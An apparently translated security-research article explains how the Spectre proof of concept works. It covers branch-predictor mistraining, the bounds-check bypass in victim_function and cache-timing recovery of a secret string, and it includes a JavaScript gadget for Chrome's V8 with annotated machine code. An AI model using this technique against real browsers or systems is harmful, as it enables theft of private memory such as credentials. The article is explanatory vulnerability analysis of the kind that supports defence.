Detailed analysis of CPU vulnerability Spectre

Source: Internet
Author: User

1. Preface

Researchers at Alpha Lab worked through the proof of concept (POC) to analyze the principles, procedure, and details of the vulnerability.

In this article, we analyze the key points of each step of the POC and the details of the vulnerability: what causes it, the idea and method behind the attack, and how the attack proceeds. We also look at how the vulnerability can be exploited in a browser and what impact that has.

2. Introduction to the POC process

First, we introduce the execution process of the POC.

 
(Fig. 2.1)

Figure 2.1 shows the code that is vulnerable to the branch-prediction attack: its conditional branch can be predicted, and the body of the branch can be executed speculatively. What we want to obtain is the secret string "Topsec test this vul!!" stored in memory. The address of the character T in Topsec is written addr(T).
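Figure 2.1 is not reproduced here. As a rough sketch of the kind of function the text describes, the following assumes the layout of the widely circulated Spectre proof of concept. The names victim_function, array1, array1_size, array2 and the factor 512 come from the text; the contents of array1 and the temp variable are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>

unsigned int array1_size = 16;
uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * 512];  /* probe array: one 512-byte slot per byte value */
uint8_t temp = 0;           /* assumed sink so the load is not optimized away */

/* Architecturally, the load only happens when x is in bounds.
 * Speculatively, a mistrained branch predictor may run the body
 * before the comparison has been resolved. */
void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}
```

Seen from the program, an out-of-bounds x has no effect at all; the leak exists only in which cache line of array2 the speculative load touched.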

 
(Fig. 2.2)

At number 1 in Figure 2.2, malicious_x is passed into victim_function. Because malicious_x = addr(T) - addr(array1), array1[malicious_x] is T; this follows from how array indexing computes addresses. Normally, if x is not smaller than array1_size, array1[x] cannot be read. However, if we first train the branch by calling the function several times with x values smaller than array1_size, the CPU's branch predictor learns to expect x < array1_size. When malicious_x (which is actually larger than array1_size) is then passed in, the CPU assumes that it is smaller than array1_size and speculatively executes the read: the value array1[x] * 512 is used as an index into array2. The bounds check still protects the program, because once the CPU finds that malicious_x exceeds the size of array1, the speculative result is discarded and never committed. The data touched by the speculative computation, however, stays in the CPU cache. This is the cause of the vulnerability; it is explained in more detail below.
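The offset arithmetic above can be checked with a small sketch. To keep the C well defined, it assumes a single hypothetical buffer (memory) that holds array1 at offset 0 and the secret at offset 0xA0; in the real POC these are separate objects and the read is out of bounds, reachable only speculatively. The function names are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical flat memory image: array1 at offset 0, the secret at 0xA0. */
static uint8_t memory[256];

/* Distance from array1 to the secret, i.e. addr(T) - addr(array1). */
size_t compute_malicious_x(const uint8_t *array1, const char *secret) {
    return (size_t)(secret - (const char *)array1);
}

/* Places a secret at offset 0xA0 and returns what array1[malicious_x] reads. */
uint8_t read_via_offset(const char *text) {
    uint8_t *array1 = memory;              /* stands in for the 16-byte array1 */
    char *secret = (char *)memory + 0xA0;  /* the secret lives past array1 */
    size_t room = sizeof memory - 0xA0 - 1;

    strncpy(secret, text, room);
    secret[room] = '\0';

    size_t malicious_x = compute_malicious_x(array1, secret);
    return array1[malicious_x];            /* same byte as secret[0] */
}
```

Calling read_via_offset("Topsec test this vul!!") returns the character T, because indexing array1 with the address difference lands exactly on the first byte of the secret.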

In Figure 2.2, len = 24 at number 2 corresponds to our secret "Topsec test this vul!!", and the first byte of the secret is at offset A0: Reading at malicious_x = 00000000000000A0...

The readMemoryByte function in Figure 2.2 takes three parameters: the first is the address of the secret, value is the secret value, and score is the score.

The following describes how the attacker builds a training set that drives the CPU's branch prediction and speculative execution.

 
(Fig. 2.3)

In Figure 2.3, numbers 1 and 3 flush the arrays from the CPU cache. Number 2 sets the training value, which starts at 7 and then decreases on each attempt, never exceeding array1_size (16). Each attempt runs five groups; within each group, five training calls are followed by a sixth call that passes the address of the secret. Numbers 4, 5, and 6 are the formula that selects x: the training value for five calls and then malicious_x on the sixth, repeated for the five groups. Number 7 calls the vulnerable function. How the vulnerability is triggered is discussed later.
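Since Figure 2.3 is not reproduced, here is a hedged sketch of how such a selection formula can work, modeled on the bit-twiddling used in the public Spectre proof of concept. The function names select_x and training_value are hypothetical, the attempt counter starting at 999 is an assumption taken from that POC, and j is assumed to be non-negative.

```c
#include <stddef.h>

/* Returns malicious_x when j is a multiple of 6, otherwise training_x,
 * using only bit operations so the selection itself adds no branch. */
size_t select_x(int j, size_t training_x, size_t malicious_x) {
    /* (j % 6) - 1 is -1 only when j % 6 == 0; the mask keeps its high bits. */
    size_t mask = (size_t)((j % 6) - 1) & ~(size_t)0xFFFF;
    mask |= mask >> 16;  /* all ones if j % 6 == 0, otherwise zero */
    return training_x ^ (mask & (malicious_x ^ training_x));
}

/* Training value for one attempt. With an assumed counter that starts
 * at 999 and array1_size = 16, the sequence begins 7, 6, 5, ... */
size_t training_value(int tries, size_t array1_size) {
    return (size_t)tries % array1_size;
}
```

With j counting down from 29 to 0, this yields five training calls followed by one malicious call, five times over, which matches the five groups described above.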

3. Detailed introduction to the vulnerability principle

The vulnerability is triggered by branch prediction.

if (x < array1_size)

What is prediction? Using existing data as the basis for a judgment about what will happen next is prediction.

For example, take a set of x values that the attacker controls. The attacker feeds the system many values smaller than array1_size so that the branch predictor always predicts x < array1_size. Here array1_size is 16: unsigned int array1_size = 16;

The figure below shows the values of x that I printed.

x first enters victim_function(x) with the value 7. Each round has five training calls, and 7 is the first training value. In this round, 7 is passed five times, and on the sixth call malicious_x, that is 0xA0, is passed. The first five calls satisfy 7 < array1_size = 16; they train the CPU's branch predictor to predict that x is smaller than array1_size. The sixth call then suddenly supplies a value larger than array1_size, malicious_x = 0xA0. The access is out of bounds, but by the time the check resolves, speculative execution has already used "T * 512" as an index into array2 and pulled that location into the CPU cache. The access is never actually committed: if you print x inside the if body, you will never see malicious_x, only values from 0 to 15. The system is still protected in this sense: once the misprediction is detected, the CPU does not write the computed value back. If it did, the attacker would not need a side channel to read the data; without this protection, the vulnerability would have an even greater impact.

The subsequent training values keep decreasing, and each group repeats until we get the expected result. We train so many groups because the more training there is, the more likely the branch predictor is to follow the attacker's logic. Simply put, if one group is not enough, use two; if two are not enough, use three, and so on until the read succeeds.
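To make the effect of repeated training concrete, here is a toy model: a 2-bit saturating counter, a textbook predictor design. Real CPU predictors are far more elaborate and undocumented, so this is only an illustration; all names in it are hypothetical.

```c
#include <stdbool.h>

/* Toy 2-bit saturating counter:
 * states 0-1 predict "out of bounds", states 2-3 predict "in bounds". */
typedef struct {
    int state;
} predictor_t;

bool predict_in_bounds(const predictor_t *p) {
    return p->state >= 2;
}

/* Moves the counter one step toward the observed outcome. */
void update(predictor_t *p, bool was_in_bounds) {
    if (was_in_bounds) {
        if (p->state < 3) p->state++;
    } else {
        if (p->state > 0) p->state--;
    }
}

/* Runs `rounds` training calls, then reports whether the following
 * call with malicious_x would be predicted as in bounds. */
bool mistrained_after(int rounds, unsigned array1_size,
                      unsigned training_x, unsigned malicious_x) {
    predictor_t p = {0};
    for (int i = 0; i < rounds; i++) {
        update(&p, training_x < array1_size);
    }
    bool predicted = predict_in_bounds(&p);
    update(&p, malicious_x < array1_size);  /* the real outcome corrects it */
    return predicted;
}
```

In this model a single training call is not enough to flip the prediction, while five calls with x = 7 leave the counter saturated, so the sixth call with 0xA0 is predicted as in bounds.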

The following describes the side-channel attack in the readMemoryByte function.

 

Because the element of array2 at index array1[malicious_x] * 512 is already in the CPU cache, the element of array2 that is fastest to access most likely corresponds to our secret.

The secret can be recovered because the data at &array2[array1[malicious_x] * 512] is already in the CPU cache; the entries for the training values (1 to 15) are cached as well (see Figure 2.3, number 3). When the CPU accesses array2, it first checks the CPU cache and only reads from memory if the data is not there. That is the point of the cache: main memory is slow, and caching speeds up the CPU's computation. time2 is the time taken to access an element of array2. If time2 is less than or equal to a threshold (the threshold differs across CPUs and compilers), we can conclude that this element was served from the cache rather than from memory. Because the cached entries for 1 to 15 have been cleared, only the entry loaded under malicious_x remains in the CPU cache, so the index of the fast element in array2 is the secret we are looking for.

The search works as follows: the mix_i in array2[mix_i * 512] is the secret byte, because the speculative access was to array2[value(T) * 512]; timing is only needed to determine which mix_i it is. Each hit adds one to that candidate's score, and the scores are then filtered. We accept the result when the highest score is greater than or equal to twice the second-highest score plus 5, or when the highest score is exactly 2 and the second-highest is 0.
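The threshold test can be sketched without real timing instructions by feeding it already-measured latencies. In the sketch below, CACHE_HIT_THRESHOLD = 80 is an assumed value that would need tuning per machine, the mix_index formula follows the public Spectre proof of concept, and the skip parameter is an assumption reflecting that the entry touched during training is cached too and must not be counted.

```c
#include <stddef.h>
#include <stdint.h>

#define CACHE_HIT_THRESHOLD 80  /* cycles; assumed, must be tuned per CPU */

/* Probe order for array2: a permutation of 0..255 that avoids a simple
 * stride which a hardware prefetcher could follow. */
int mix_index(int i) {
    return ((i * 167) + 13) & 255;
}

/* latency[v] is the measured access time of array2[v * 512].
 * Every slot at or below the threshold gets one point, except the
 * slot that the training calls are known to have cached. */
void score_hits(const uint64_t latency[256], int results[256], int skip) {
    for (int i = 0; i < 256; i++) {
        int mix_i = mix_index(i);
        if (latency[mix_i] <= CACHE_HIT_THRESHOLD && mix_i != skip) {
            results[mix_i]++;
        }
    }
}
```

In a real attack the latency values would come from a cycle counter read around each access to array2; here they are passed in so that the classification logic can be examined on its own.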
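The score filtering described above can be sketched as follows. The stop condition mirrors the one in the public Spectre proof of concept; the function names top_two and is_confident are hypothetical.

```c
/* Finds the indices of the highest and second-highest scores. */
void top_two(const int results[256], int *best, int *second) {
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) {
            k = j;  /* the previous best becomes the runner-up */
            j = i;
        } else if (k < 0 || results[i] >= results[k]) {
            k = i;
        }
    }
    *best = j;
    *second = k;
}

/* Accept when the best score is at least twice the runner-up plus 5,
 * or when it is exactly 2 and the runner-up has no hits at all. */
int is_confident(int best_score, int second_score) {
    return best_score >= 2 * second_score + 5 ||
           (best_score == 2 && second_score == 0);
}
```

For example, a best score of 9 against a runner-up of 1 is accepted, while 3 against 1 is not, so the attack loop would keep trying.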

4. JavaScript attack on Chrome

The same attack can be mounted by loading a JavaScript script in a browser to read private memory. When a web page embeds malicious JavaScript code, it can obtain private data in the browser, for example the password of a personal login credential. The original English paper describes the attack in Chrome. Chrome uses the V8 engine, which compiles JavaScript into machine code before execution to improve performance.

Our analysis shows that the logic is basically the same as in the C version of Spectre. index is first used to read simpleByteArray. Values smaller than length are passed in first so that the CPU predicts that malicious_x is also smaller than length and speculatively executes the code after the check. The subsequent computation and assignment only leave traces in the CPU cache; they are never actually committed. If you print the index after the check, you will never see the value of malicious_x. The principle is the same as above. Next, let's analyze the details of the vulnerability through the compiled code.

First, let's look at the function that triggers speculative execution.

if (index < simpleByteArray.length) {
    index = simpleByteArray[index | 0];
    index = (((index * TABLE1_STRIDE) | 0) & (TABLE1_BYTES - 1)) | 0;
    localJunk ^= probeTable[index | 0] | 0;
}

After V8 compiles it, the machine code is:

1 cmpl r15, [rbp-0xe0];

Compare index with simpleByteArray.length.

2 jnc 0x24dd099bb870;

Jump past the block if index is greater than or equal to length.

3 REX.W leaq rsi, [r12 + rdx * 1];

Set rsi = r12 + rdx, the address of the first byte of simpleByteArray (the base address, analogous to addr(array1) above).

4 movzxbl rsi, [rsi + r15 * 1];

Read one byte from rsi + r15 (= base address + index).

5 shll rsi, 12;

Multiply rsi by 4096 (TABLE1_STRIDE) by shifting it left by 12 bits.

6 andl rsi, 0x1ffffff;

The high bits of rsi are cleared so that the index cannot exceed the length of probeTable. probeTable plays the same role as array2 in the C version of Spectre. The index must stay within probeTable (array2); otherwise the out-of-range access would be stopped, and speculative execution could not bring the entry selected through malicious_x into the CPU cache.

7 movzxbl rsi, [rsi + r8 * 1];

Read from probeTable, which is the same as reading array2.

8 xorl rsi, rdi;

XOR the read result with localJunk.

9 REX.W movq rdi, rsi;

Then store localJunk in the rdi register.
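Steps 5 and 6 of the listing can be mirrored in a few lines of C. TABLE1_STRIDE = 4096 is stated above; TABLE1_BYTES = 1 << 25 is inferred from the mask 0x1ffffff rather than given in the text, and the function name probe_index is hypothetical.

```c
#include <stdint.h>

#define TABLE1_STRIDE 4096u       /* matches the shift by 12 */
#define TABLE1_BYTES  (1u << 25)  /* inferred from the mask 0x1ffffff */

/* Maps a byte read from simpleByteArray to its offset in probeTable. */
uint32_t probe_index(uint8_t leaked_byte) {
    uint32_t index = (uint32_t)leaked_byte * TABLE1_STRIDE;  /* shll rsi, 12 */
    return index & (TABLE1_BYTES - 1u);               /* andl rsi, 0x1ffffff */
}
```

Each possible byte value therefore selects its own 4096-byte slot in probeTable, and the mask guarantees that the resulting offset is always inside the table.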

Summary:

Spectre attacks exploit the CPU's branch prediction and speculative execution, which cause private data to leave a trace in the CPU cache ahead of time. The protection mechanism never commits the speculative results, and we have no permission to read the CPU cache directly, but by measuring array access times we can determine which index was loaded and so recover the private data that was used as the subscript. For browsers, the trigger principle is the same as in the C POC, but because JavaScript is a scripting language with a number of limitations, the attack has to take a different form. For example, every array subscript is ORed with 0: the value stays the same, but its type is converted to an integer. Without this conversion, the JavaScript array subscript would not be treated as an integer.

Some functions used in the C POC do not exist in JavaScript, such as the timing function and the cache-flush function. However, they can be replaced by other means, so private data can still be obtained.

What we can imagine is that, while we browse a website, our personal data is secretly stolen. Because this is a CPU vulnerability, every platform is affected, so the scope and impact are very large.
